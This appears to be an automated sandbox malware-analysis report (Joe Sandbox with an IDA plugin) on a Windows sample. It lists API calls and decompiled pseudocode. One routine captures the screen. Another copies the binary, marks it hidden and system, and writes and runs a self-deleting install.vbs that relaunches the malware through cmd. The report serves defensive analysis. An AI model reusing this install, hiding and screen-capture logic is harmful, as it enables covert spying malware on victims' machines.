                                                                                                                                      0x013065c1
                                                                                                                                      0x013065db
                                                                                                                                      0x013065e1
                                                                                                                                      0x013065e4
                                                                                                                                      0x013065e6
                                                                                                                                      0x01306600
                                                                                                                                      0x01306606
                                                                                                                                      0x01306608
                                                                                                                                      0x0130661b
                                                                                                                                      0x01306621
                                                                                                                                      0x01306624
                                                                                                                                      0x01306627
                                                                                                                                      0x0130662c
                                                                                                                                      0x0130664c
                                                                                                                                      0x01306652
                                                                                                                                      0x01306654
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306656
                                                                                                                                      0x0130665a
                                                                                                                                      0x0130665f
                                                                                                                                      0x01306667
                                                                                                                                      0x0130666d
                                                                                                                                      0x0130666f
                                                                                                                                      0x0130667b
                                                                                                                                      0x01306681
                                                                                                                                      0x01306683
                                                                                                                                      0x013066a0
                                                                                                                                      0x013066a0
                                                                                                                                      0x013066a3
                                                                                                                                      0x013066af
                                                                                                                                      0x013066ba
                                                                                                                                      0x013066be
                                                                                                                                      0x013066c4
                                                                                                                                      0x013066c4
                                                                                                                                      0x01306683
                                                                                                                                      0x0130666f
                                                                                                                                      0x013066ca
                                                                                                                                      0x013066cd
                                                                                                                                      0x013066d2
                                                                                                                                      0x013066d8
                                                                                                                                      0x013066da
                                                                                                                                      0x00000000
                                                                                                                                      0x013066e0
                                                                                                                                      0x013066ea
                                                                                                                                      0x013066ed
                                                                                                                                      0x013066f0
                                                                                                                                      0x013066f8
                                                                                                                                      0x013066f9
                                                                                                                                      0x013066fc
                                                                                                                                      0x0130672b
                                                                                                                                      0x0130672b
                                                                                                                                      0x01306730
                                                                                                                                      0x01306730
                                                                                                                                      0x01306732
                                                                                                                                      0x0130673f
                                                                                                                                      0x01306745
                                                                                                                                      0x0130674a
                                                                                                                                      0x0130674b
                                                                                                                                      0x0130674b
                                                                                                                                      0x0130674d
                                                                                                                                      0x01306756
                                                                                                                                      0x0130675c
                                                                                                                                      0x01306763
                                                                                                                                      0x0130676b
                                                                                                                                      0x0130676f
                                                                                                                                      0x01306772
                                                                                                                                      0x01306777
                                                                                                                                      0x01306779
                                                                                                                                      0x01306779
                                                                                                                                      0x0130677f
                                                                                                                                      0x01306786
                                                                                                                                      0x01306787
                                                                                                                                      0x01306797
                                                                                                                                      0x0130679a
                                                                                                                                      0x013067a0
                                                                                                                                      0x013067a3
                                                                                                                                      0x013067a9
                                                                                                                                      0x013067ac
                                                                                                                                      0x013067ae
                                                                                                                                      0x013067cf
                                                                                                                                      0x013067d3
                                                                                                                                      0x013067d9
                                                                                                                                      0x013067db
                                                                                                                                      0x01306808
                                                                                                                                      0x0130681c
                                                                                                                                      0x01306821
                                                                                                                                      0x01306832
                                                                                                                                      0x01306835
                                                                                                                                      0x0130683a
                                                                                                                                      0x0130683a
                                                                                                                                      0x0130683a
                                                                                                                                      0x01306844
                                                                                                                                      0x0130684e
                                                                                                                                      0x01306856
                                                                                                                                      0x01306865
                                                                                                                                      0x01306870
                                                                                                                                      0x0130687f
                                                                                                                                      0x01306887
                                                                                                                                      0x0130688e
                                                                                                                                      0x0130689d
                                                                                                                                      0x013068a5
                                                                                                                                      0x013068ac
                                                                                                                                      0x013068bb
                                                                                                                                      0x013068be
                                                                                                                                      0x013068c9
                                                                                                                                      0x013068d4
                                                                                                                                      0x013068dc
                                                                                                                                      0x00000000
                                                                                                                                      0x013068dc
                                                                                                                                      0x013067e6
                                                                                                                                      0x013067e9
                                                                                                                                      0x013067ee
                                                                                                                                      0x013067f8
                                                                                                                                      0x00000000
                                                                                                                                      0x013067b0
                                                                                                                                      0x013067b9
                                                                                                                                      0x013067bb
                                                                                                                                      0x01306613
                                                                                                                                      0x01306614
                                                                                                                                      0x013065f6
                                                                                                                                      0x00000000
                                                                                                                                      0x013065f6
                                                                                                                                      0x013067ae
                                                                                                                                      0x01306700
                                                                                                                                      0x01306701
                                                                                                                                      0x01306704
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306708
                                                                                                                                      0x01306709
                                                                                                                                      0x0130670c
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01306710
                                                                                                                                      0x01306711
                                                                                                                                      0x01306714
                                                                                                                                      0x0130672a
                                                                                                                                      0x00000000
                                                                                                                                      0x0130672a
                                                                                                                                      0x0130671a
                                                                                                                                      0x0130671c
                                                                                                                                      0x01306723
                                                                                                                                      0x01306724
                                                                                                                                      0x00000000
                                                                                                                                      0x01306724
                                                                                                                                      0x013066f2
                                                                                                                                      0x00000000
                                                                                                                                      0x013066f2
                                                                                                                                      0x013066da
                                                                                                                                      0x0130660a
                                                                                                                                      0x01306611
                                                                                                                                      0x00000000
                                                                                                                                      0x013065e8
                                                                                                                                      0x013065ef
                                                                                                                                      0x013065f2
                                                                                                                                      0x013065f6
                                                                                                                                      0x013065f6
                                                                                                                                      0x00000000
                                                                                                                                      0x013065f6
                                                                                                                                      0x013065c7
                                                                                                                                      0x013065c7
                                                                                                                                      0x013065ce
                                                                                                                                      0x013068e1
                                                                                                                                      0x013068e8
                                                                                                                                      0x013068f1
                                                                                                                                      0x013068f1

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01306566
                                                                                                                                      • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01306589
                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 01306595
                                                                                                                                        • Part of subcall function 01306D93: GetMonitorInfoW.USER32(00010001,?), ref: 01306DB3
                                                                                                                                        • Part of subcall function 01306DDB: GetMonitorInfoW.USER32(00010001,?), ref: 01306DFB
                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 013065DB
                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 013065EF
                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 013065F2
                                                                                                                                      • DeleteObject.GDI32(?), ref: 013065F6
                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 01306600
                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 01306611
                                                                                                                                      • DeleteDC.GDI32(00000000), ref: 01306614
                                                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,?,?,?,00CC0020), ref: 0130664C
                                                                                                                                      • GetCursorInfo.USER32(?), ref: 01306667
                                                                                                                                      • GetIconInfo.USER32(?,?), ref: 0130667B
                                                                                                                                      • DeleteObject.GDI32(?), ref: 013066A3
                                                                                                                                      • DeleteObject.GDI32(?), ref: 013066AF
                                                                                                                                      • DrawIcon.USER32 ref: 013066BE
                                                                                                                                      • GetObjectW.GDI32(?,00000018,?), ref: 013066D2
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000028), ref: 0130671C
                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 0130673F
                                                                                                                                      • GlobalAlloc.KERNEL32(00000000,?), ref: 013067A3
                                                                                                                                      • DeleteDC.GDI32(?), ref: 013067B9
                                                                                                                                      • GetDIBits.GDI32(?,00000000,00000000,?,00000000,00000000,00000000), ref: 013067D3
                                                                                                                                      • DeleteDC.GDI32(?), ref: 013067E6
                                                                                                                                      • DeleteDC.GDI32(?), ref: 013067E9
                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 013067EE
                                                                                                                                      • GlobalFree.KERNEL32 ref: 013067F8
                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 013068A5
                                                                                                                                      • GlobalFree.KERNEL32 ref: 013068AC
                                                                                                                                      • DeleteDC.GDI32(?), ref: 013068BB
                                                                                                                                      • DeleteDC.GDI32(?), ref: 013068BE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Delete$Object$Info$AllocCreateGlobal$CompatibleFreeIconLocalMonitor$BitmapBitsCursorDrawH_prologSelectStretch
                                                                                                                                      • String ID: DISPLAY
                                                                                                                                      • API String ID: 2390905695-865373369
                                                                                                                                      • Opcode ID: d224e065172b12667bf57ee79f860b7e46beedae38b1824b92d27c57dc399d4a
                                                                                                                                      • Instruction ID: 06552ba9180cc36eeeca69faf0a6ccd68cc9367b7fa4ef48cc5f98298e8ebe5f
                                                                                                                                      • Opcode Fuzzy Hash: d224e065172b12667bf57ee79f860b7e46beedae38b1824b92d27c57dc399d4a
                                                                                                                                      • Instruction Fuzzy Hash: DBB16FB59002199FDB21EFA8DC55BAEBBF8FF48714F008429E506E7284EB34A955CF50
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                      			E01304DC5(char __ecx, void* __edx, void* __eflags) {
                                                                                                                                      				void* __ebx;
                                                                                                                                      				void* __edi;
                                                                                                                                      				void* __esi;
                                                                                                                                      				void* _t89;
                                                                                                                                      				void* _t90;
                                                                                                                                      				void* _t94;
                                                                                                                                      				void* _t106;
                                                                                                                                      				void* _t107;
                                                                                                                                      				void* _t108;
                                                                                                                                      				void* _t109;
                                                                                                                                      				void* _t110;
                                                                                                                                      				void* _t118;
                                                                                                                                      				signed int _t124;
                                                                                                                                      				void* _t128;
                                                                                                                                      				void* _t129;
                                                                                                                                      				void* _t130;
                                                                                                                                      				void* _t131;
                                                                                                                                      				void* _t132;
                                                                                                                                      				void* _t133;
                                                                                                                                      				WCHAR* _t141;
                                                                                                                                      				int _t143;
                                                                                                                                      				int _t146;
                                                                                                                                      				WCHAR* _t150;
                                                                                                                                      				void* _t153;
                                                                                                                                      				intOrPtr _t167;
                                                                                                                                      				void* _t168;
                                                                                                                                      				char _t177;
                                                                                                                                      				void* _t238;
                                                                                                                                      				void* _t265;
                                                                                                                                      				void* _t284;
                                                                                                                                      				void* _t287;
                                                                                                                                      				void* _t291;
                                                                                                                                      				void* _t293;
                                                                                                                                      				intOrPtr* _t294;
                                                                                                                                      
                                                                                                                                      				_t265 = __edx;
                                                                                                                                      				_t177 = __ecx;
                                                                                                                                      				E01323174(E0132358B, __edx, __eflags);
                                                                                                                                      				_t294 = _t293 - 0xf8;
                                                                                                                                      				_t287 = _t265;
                                                                                                                                      				_t172 = _t177;
                                                                                                                                      				 *((char*)(_t291 - 0x11)) = _t177;
                                                                                                                                      				_t89 = E01310EA0(_t287);
                                                                                                                                      				_t297 = _t89;
                                                                                                                                      				if(_t89 == 0) {
                                                                                                                                      					_t173 =  *(_t291 + 8);
                                                                                                                                      					_t266 =  *((intOrPtr*)(_t291 - 0x11));
                                                                                                                                      					_push(_t173);
                                                                                                                                      					_t90 = E01307692(_t291 - 0x5c,  *((intOrPtr*)(_t291 - 0x11)), __eflags);
                                                                                                                                      					_t284 = 0x132f900;
                                                                                                                                      					E0130275A(0x132f900,  *((intOrPtr*)(_t291 - 0x11)), _t90);
                                                                                                                                      				} else {
                                                                                                                                      					_push(_t287);
                                                                                                                                      					E0130275A(0x132f918, _t172, E01307692(_t291 - 0x44, _t172, _t297));
                                                                                                                                      					E01302755(_t291 - 0x44, _t172, _t297);
                                                                                                                                      					CreateDirectoryW(E01302712(0x132f918, _t297), 0);
                                                                                                                                      					_push(0x1329c08);
                                                                                                                                      					_t167 = E013031D6(_t291 - 0x5c, 0x132f918, _t297);
                                                                                                                                      					_t173 =  *(_t291 + 8);
                                                                                                                                      					 *(_t291 - 4) =  *(_t291 - 4) & 0x00000000;
                                                                                                                                      					_t266 = _t167;
                                                                                                                                      					_t168 = E013031AE(_t291 - 0x44, _t167, 0x132f918, _t173);
                                                                                                                                      					_t284 = 0x132f900;
                                                                                                                                      					E0130275A(0x132f900, _t167, _t168);
                                                                                                                                      					E01302755(_t291 - 0x44, _t167, _t297);
                                                                                                                                      					 *(_t291 - 4) =  *(_t291 - 4) | 0xffffffff;
                                                                                                                                      				}
                                                                                                                                      				E01302755(_t291 - 0x5c, _t266, _t297);
                                                                                                                                      				_t94 = E01311D8A(E01302712(_t284, _t297), "C:\Users\hardz\AppData\Local\Temp\hjrypmyqervekvpteu.exe", _t93);
                                                                                                                                      				_t298 = _t94;
                                                                                                                                      				if(_t94 != 0) {
                                                                                                                                      					__eflags = PathFileExistsW(E01302712(_t284, __eflags));
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						SetFileAttributesW(E01302712(_t284, __eflags), 0x80);
                                                                                                                                      					}
                                                                                                                                      					__eflags = CopyFileW("C:\Users\hardz\AppData\Local\Temp\hjrypmyqervekvpteu.exe", E01302712(_t284, __eflags), 0);
                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                      						L14:
                                                                                                                                      						_push( *((intOrPtr*)(_t291 + 0x1c)));
                                                                                                                                      						_t267 =  *((intOrPtr*)(_t291 + 0x18));
                                                                                                                                      						E01305229( *((intOrPtr*)(_t291 + 0x14)),  *((intOrPtr*)(_t291 + 0x18)), __eflags);
                                                                                                                                      						__eflags =  *((char*)(_t291 + 0xc)) - 1;
                                                                                                                                      						_pop(0x132f918);
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t141 = E01302712(_t284, __eflags);
                                                                                                                                      							_t173 = SetFileAttributesW;
                                                                                                                                      							SetFileAttributesW(_t141, 7);
                                                                                                                                      							_t143 = E01310EA0(_t287);
                                                                                                                                      							_pop(0x132f918);
                                                                                                                                      							__eflags = _t143;
                                                                                                                                      							if(__eflags != 0) {
                                                                                                                                      								SetFileAttributesW(E01302712(0x132f918, __eflags), 7);
                                                                                                                                      							}
                                                                                                                                      						}
                                                                                                                                      						_t268 = E013027E1(_t291 - 0x74, _t267, E01311D74(_t173, 0x132f918, _t284, L"Temp"));
                                                                                                                                      						 *(_t291 - 4) = 3;
                                                                                                                                      						E013031AE(_t291 - 0x8c, _t101, _t284, L"\\install.vbs");
                                                                                                                                      						 *(_t291 - 4) = 5;
                                                                                                                                      						E01302755(_t291 - 0x74, _t101, __eflags);
                                                                                                                                      						E013027E1(_t291 - 0x2c, _t101, L"WScript.Sleep 1000\n");
                                                                                                                                      						 *(_t291 - 4) = 6;
                                                                                                                                      						E01303A48(_t291 - 0x2c, _t284, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n");
                                                                                                                                      						__eflags =  *((char*)(_t291 + 0x10)) - 1;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_t128 = E013027E1(_t291 - 0xd4, _t268, "C:\Users\hardz\AppData\Local\Temp\hjrypmyqervekvpteu.exe");
                                                                                                                                      							 *(_t291 - 4) = 7;
                                                                                                                                      							_t129 = E013027E1(_t291 - 0xbc, _t268, L"fso.DeleteFile ");
                                                                                                                                      							 *(_t291 - 4) = 8;
                                                                                                                                      							_t130 = E013031AE(_t291 - 0xa4, _t129, _t284, "\"");
                                                                                                                                      							 *(_t291 - 4) = 9;
                                                                                                                                      							_t131 = E0130333B(_t130, _t128);
                                                                                                                                      							 *(_t291 - 4) = 0xa;
                                                                                                                                      							_t132 = E013031AE(_t291 - 0x5c, _t131, _t284, "\"");
                                                                                                                                      							 *(_t291 - 4) = 0xb;
                                                                                                                                      							_t268 = _t132;
                                                                                                                                      							 *_t294 = "\n";
                                                                                                                                      							_t133 = E013031AE(_t291 - 0x74, _t132, _t284);
                                                                                                                                      							 *(_t291 - 4) = 0xc;
                                                                                                                                      							E0130271E(_t291 - 0x2c, _t284, _t128, __eflags, _t133);
                                                                                                                                      							E01302755(_t291 - 0x74, _t132, __eflags);
                                                                                                                                      							E01302755(_t291 - 0x5c, _t132, __eflags);
                                                                                                                                      							E01302755(_t291 - 0x44, _t132, __eflags);
                                                                                                                                      							E01302755(_t291 - 0xa4, _t268, __eflags);
                                                                                                                                      							E01302755(_t291 - 0xbc, _t268, __eflags);
                                                                                                                                      							 *(_t291 - 4) = 6;
                                                                                                                                      							E01302755(_t291 - 0xd4, _t268, __eflags);
                                                                                                                                      						}
                                                                                                                                      						_t106 = E013027E1(_t291 - 0x104, _t268, L"\"\"\", 0");
                                                                                                                                      						 *(_t291 - 4) = 0xd;
                                                                                                                                      						_t107 = E013027E1(_t291 - 0xec, _t268, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"");
                                                                                                                                      						 *(_t291 - 4) = 0xe;
                                                                                                                                      						_t108 = E013033AA(_t291 - 0xa4, _t107, _t284, __eflags, _t284);
                                                                                                                                      						 *(_t291 - 4) = 0xf;
                                                                                                                                      						_t109 = E0130333B(_t108, _t106);
                                                                                                                                      						 *(_t291 - 4) = 0x10;
                                                                                                                                      						_t271 = _t109;
                                                                                                                                      						 *_t294 = "\n";
                                                                                                                                      						_t110 = E013031AE(_t291 - 0xd4, _t109, _t284);
                                                                                                                                      						 *(_t291 - 4) = 0x11;
                                                                                                                                      						E0130271E(_t291 - 0x2c, _t284, _t106, __eflags, _t110);
                                                                                                                                      						E01302755(_t291 - 0xd4, _t109, __eflags);
                                                                                                                                      						E01302755(_t291 - 0xbc, _t109, __eflags);
                                                                                                                                      						E01302755(_t291 - 0xa4, _t109, __eflags);
                                                                                                                                      						E01302755(_t291 - 0xec, _t271, __eflags);
                                                                                                                                      						 *(_t291 - 4) = 6;
                                                                                                                                      						E01302755(_t291 - 0x104, _t271, __eflags);
                                                                                                                                      						E01303A48(_t291 - 0x2c, _t284, L"fso.DeleteFile(Wscript.ScriptFullName)");
                                                                                                                                      						_t118 = E01302712(_t291 - 0x8c, __eflags);
                                                                                                                                      						_t273 = E01302709() + _t119;
                                                                                                                                      						E01302712(_t291 - 0x2c, __eflags);
                                                                                                                                      						__eflags = E013074EF(E01302709() + _t119, _t118, 0);
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							L22:
                                                                                                                                      							E01302755(_t291 - 0x2c, _t273, __eflags);
                                                                                                                                      							E01302755(_t291 - 0x8c, _t273, __eflags);
                                                                                                                                      							goto L23;
                                                                                                                                      						} else {
                                                                                                                                      							__eflags = ShellExecuteW(0, L"open", E01302712(_t291 - 0x8c, __eflags), 0x1329c7c, 0x1329c7c, 0) - 0x20;
                                                                                                                                      							if(__eflags <= 0) {
                                                                                                                                      								goto L22;
                                                                                                                                      							}
                                                                                                                                      							ExitProcess(0);
                                                                                                                                      						}
                                                                                                                                      					} else {
                                                                                                                                      						__eflags =  *((char*)(_t291 - 0x11)) - 0x36;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							goto L14;
                                                                                                                                      						}
                                                                                                                                      						_t146 = E01310EA0(_t287);
                                                                                                                                      						_t277 = 0x36;
                                                                                                                                      						_t238 = _t291 - 0x74;
                                                                                                                                      						__eflags = _t146;
                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                      							_push(_t173);
                                                                                                                                      							E0130275A(_t284, 0x36, E01307692(_t238, 0x36, __eflags));
                                                                                                                                      						} else {
                                                                                                                                      							_t153 = E01307692(_t238, 0x36, __eflags);
                                                                                                                                      							 *(_t291 - 4) = 1;
                                                                                                                                      							 *_t294 = 0x1329c08;
                                                                                                                                      							_t277 = E013031AE(_t291 - 0x44, _t153, _t284, _t287);
                                                                                                                                      							 *(_t291 - 4) = 2;
                                                                                                                                      							E0130275A(_t284, _t154, E013031AE(_t291 - 0x5c, _t154, _t284, _t173));
                                                                                                                                      							E01302755(_t291 - 0x5c, _t154, __eflags);
                                                                                                                                      							E01302755(_t291 - 0x44, _t154, __eflags);
                                                                                                                                      							 *(_t291 - 4) =  *(_t291 - 4) | 0xffffffff;
                                                                                                                                      						}
                                                                                                                                      						E01302755(_t291 - 0x74, _t277, __eflags);
                                                                                                                                      						_t150 = E01302712(_t284, __eflags);
                                                                                                                                      						_t173 = 0x132f5c0;
                                                                                                                                      						__eflags = CopyFileW(0x132f5c0, _t150, 0);
                                                                                                                                      						if(__eflags != 0) {
                                                                                                                                      							goto L14;
                                                                                                                                      						} else {
                                                                                                                                      							E01302723(_t284, 0x132f5c0);
                                                                                                                                      							_t124 = 0;
                                                                                                                                      							goto L24;
                                                                                                                                      						}
                                                                                                                                      					}
                                                                                                                                      				} else {
                                                                                                                                      					_push( *((intOrPtr*)(_t291 + 0x1c)));
                                                                                                                                      					E01305229( *((intOrPtr*)(_t291 + 0x14)),  *((intOrPtr*)(_t291 + 0x18)), _t298);
                                                                                                                                      					L23:
                                                                                                                                      					_t124 = 1;
                                                                                                                                      					L24:
                                                                                                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t291 - 0xc));
                                                                                                                                      					return _t124;
                                                                                                                                      				}
                                                                                                                                      			}





































                                                                                                                                      0x01304dc5
                                                                                                                                      0x01304dc5
                                                                                                                                      0x01304dca
                                                                                                                                      0x01304dcf
                                                                                                                                      0x01304dd7
                                                                                                                                      0x01304dd9
                                                                                                                                      0x01304ddd
                                                                                                                                      0x01304de0
                                                                                                                                      0x01304deb
                                                                                                                                      0x01304ded
                                                                                                                                      0x01304e59
                                                                                                                                      0x01304e5f
                                                                                                                                      0x01304e62
                                                                                                                                      0x01304e63
                                                                                                                                      0x01304e69
                                                                                                                                      0x01304e71
                                                                                                                                      0x01304def
                                                                                                                                      0x01304def
                                                                                                                                      0x01304dfe
                                                                                                                                      0x01304e06
                                                                                                                                      0x01304e15
                                                                                                                                      0x01304e1b
                                                                                                                                      0x01304e25
                                                                                                                                      0x01304e2b
                                                                                                                                      0x01304e31
                                                                                                                                      0x01304e35
                                                                                                                                      0x01304e38
                                                                                                                                      0x01304e3e
                                                                                                                                      0x01304e46
                                                                                                                                      0x01304e4e
                                                                                                                                      0x01304e53
                                                                                                                                      0x01304e53
                                                                                                                                      0x01304e79
                                                                                                                                      0x01304e8b
                                                                                                                                      0x01304e92
                                                                                                                                      0x01304e94
                                                                                                                                      0x01304eb8
                                                                                                                                      0x01304eba
                                                                                                                                      0x01304ec9
                                                                                                                                      0x01304ec9
                                                                                                                                      0x01304ee4
                                                                                                                                      0x01304ee6
                                                                                                                                      0x01304f93
                                                                                                                                      0x01304f93
                                                                                                                                      0x01304f96
                                                                                                                                      0x01304f9c
                                                                                                                                      0x01304fa1
                                                                                                                                      0x01304fa5
                                                                                                                                      0x01304fa6
                                                                                                                                      0x01304fac
                                                                                                                                      0x01304fb1
                                                                                                                                      0x01304fb8
                                                                                                                                      0x01304fbb
                                                                                                                                      0x01304fc0
                                                                                                                                      0x01304fc1
                                                                                                                                      0x01304fc3
                                                                                                                                      0x01304fd2
                                                                                                                                      0x01304fd2
                                                                                                                                      0x01304fc3
                                                                                                                                      0x01304fed
                                                                                                                                      0x01304fef
                                                                                                                                      0x01304ffc
                                                                                                                                      0x01305005
                                                                                                                                      0x01305009
                                                                                                                                      0x01305016
                                                                                                                                      0x01305023
                                                                                                                                      0x01305027
                                                                                                                                      0x0130502c
                                                                                                                                      0x01305030
                                                                                                                                      0x01305041
                                                                                                                                      0x01305053
                                                                                                                                      0x01305057
                                                                                                                                      0x01305061
                                                                                                                                      0x0130506e
                                                                                                                                      0x01305077
                                                                                                                                      0x0130507e
                                                                                                                                      0x01305087
                                                                                                                                      0x0130508e
                                                                                                                                      0x01305093
                                                                                                                                      0x0130509a
                                                                                                                                      0x0130509c
                                                                                                                                      0x013050a3
                                                                                                                                      0x013050ad
                                                                                                                                      0x013050b1
                                                                                                                                      0x013050b9
                                                                                                                                      0x013050c1
                                                                                                                                      0x013050c9
                                                                                                                                      0x013050d4
                                                                                                                                      0x013050df
                                                                                                                                      0x013050ea
                                                                                                                                      0x013050ee
                                                                                                                                      0x013050ee
                                                                                                                                      0x013050fe
                                                                                                                                      0x01305110
                                                                                                                                      0x01305114
                                                                                                                                      0x0130511c
                                                                                                                                      0x01305126
                                                                                                                                      0x0130512f
                                                                                                                                      0x01305139
                                                                                                                                      0x0130513e
                                                                                                                                      0x01305148
                                                                                                                                      0x0130514a
                                                                                                                                      0x01305151
                                                                                                                                      0x0130515b
                                                                                                                                      0x0130515f
                                                                                                                                      0x0130516a
                                                                                                                                      0x01305175
                                                                                                                                      0x01305180
                                                                                                                                      0x0130518b
                                                                                                                                      0x01305196
                                                                                                                                      0x0130519a
                                                                                                                                      0x013051a7
                                                                                                                                      0x013051b5
                                                                                                                                      0x013051c5
                                                                                                                                      0x013051c7
                                                                                                                                      0x013051d5
                                                                                                                                      0x013051d7
                                                                                                                                      0x01305205
                                                                                                                                      0x01305208
                                                                                                                                      0x01305213
                                                                                                                                      0x00000000
                                                                                                                                      0x013051d9
                                                                                                                                      0x013051f9
                                                                                                                                      0x013051fc
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x013051ff
                                                                                                                                      0x013051ff
                                                                                                                                      0x01304eec
                                                                                                                                      0x01304eec
                                                                                                                                      0x01304ef0
                                                                                                                                      0x00000000
                                                                                                                                      0x00000000
                                                                                                                                      0x01304ef7
                                                                                                                                      0x01304efc
                                                                                                                                      0x01304eff
                                                                                                                                      0x01304f02
                                                                                                                                      0x01304f04
                                                                                                                                      0x01304f53
                                                                                                                                      0x01304f5d
                                                                                                                                      0x01304f06
                                                                                                                                      0x01304f07
                                                                                                                                      0x01304f0c
                                                                                                                                      0x01304f18
                                                                                                                                      0x01304f26
                                                                                                                                      0x01304f28
                                                                                                                                      0x01304f38
                                                                                                                                      0x01304f40
                                                                                                                                      0x01304f48
                                                                                                                                      0x01304f4d
                                                                                                                                      0x01304f4d
                                                                                                                                      0x01304f65
                                                                                                                                      0x01304f6e
                                                                                                                                      0x01304f74
                                                                                                                                      0x01304f80
                                                                                                                                      0x01304f82
                                                                                                                                      0x00000000
                                                                                                                                      0x01304f84
                                                                                                                                      0x01304f87
                                                                                                                                      0x01304f8c
                                                                                                                                      0x00000000
                                                                                                                                      0x01304f8c
                                                                                                                                      0x01304f82
                                                                                                                                      0x01304e96
                                                                                                                                      0x01304e96
                                                                                                                                      0x01304e9f
                                                                                                                                      0x01305218
                                                                                                                                      0x01305218
                                                                                                                                      0x0130521a
                                                                                                                                      0x0130521f
                                                                                                                                      0x01305228
                                                                                                                                      0x01305228

                                                                                                                                      APIs
                                                                                                                                      • __EH_prolog.LIBCMT ref: 01304DCA
                                                                                                                                      • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0132F930,00000000,00000000), ref: 01304E15
                                                                                                                                        • Part of subcall function 013031D6: __EH_prolog.LIBCMT ref: 013031DB
                                                                                                                                      • _wcslen.LIBCMT ref: 01304DE0
                                                                                                                                        • Part of subcall function 01307692: __EH_prolog.LIBCMT ref: 01307697
                                                                                                                                      • PathFileExistsW.SHLWAPI(00000000,00000000,0132F930,00000000,00000000), ref: 01304EB2
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 01304EC9
                                                                                                                                        • Part of subcall function 01307692: GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 013077FA
                                                                                                                                        • Part of subcall function 01305229: __EH_prolog.LIBCMT ref: 0130522E
                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe,00000000,00000000), ref: 01304EDE
                                                                                                                                      • _wcslen.LIBCMT ref: 01304EF7
                                                                                                                                      • CopyFileW.KERNEL32(C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe,00000000,00000000,00000000), ref: 01304F7A
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 01304FB8
                                                                                                                                      • _wcslen.LIBCMT ref: 01304FBB
                                                                                                                                      • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 01304FD2
                                                                                                                                      • ShellExecuteW.SHELL32(00000000,open,00000000,01329C7C,01329C7C,00000000), ref: 013051F3
                                                                                                                                      • ExitProcess.KERNEL32 ref: 013051FF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.505409012.0000000001301000.00000020.00000001.01000000.00000005.sdmp, Offset: 01300000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.505385438.0000000001300000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505578317.0000000001324000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505631265.000000000132E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.505681175.0000000001330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_1300000_hjrypmyqervekvpteu.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$H_prolog$Attributes_wcslen$CopyPath$CreateDirectoryExecuteExistsExitLongNameProcessShell
                                                                                                                                      • String ID: """, 0$6$C:\Users\user\AppData\Local\Temp\hjrypmyqervekvpteu.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open
                                                                                                                                      • API String ID: 3565457783-3770992167
                                                                                                                                      • Opcode ID: 6a02ac0e01ebce26f0a26bfc8176494fd4f8e7b68d4bc53890c300b4a650eba9
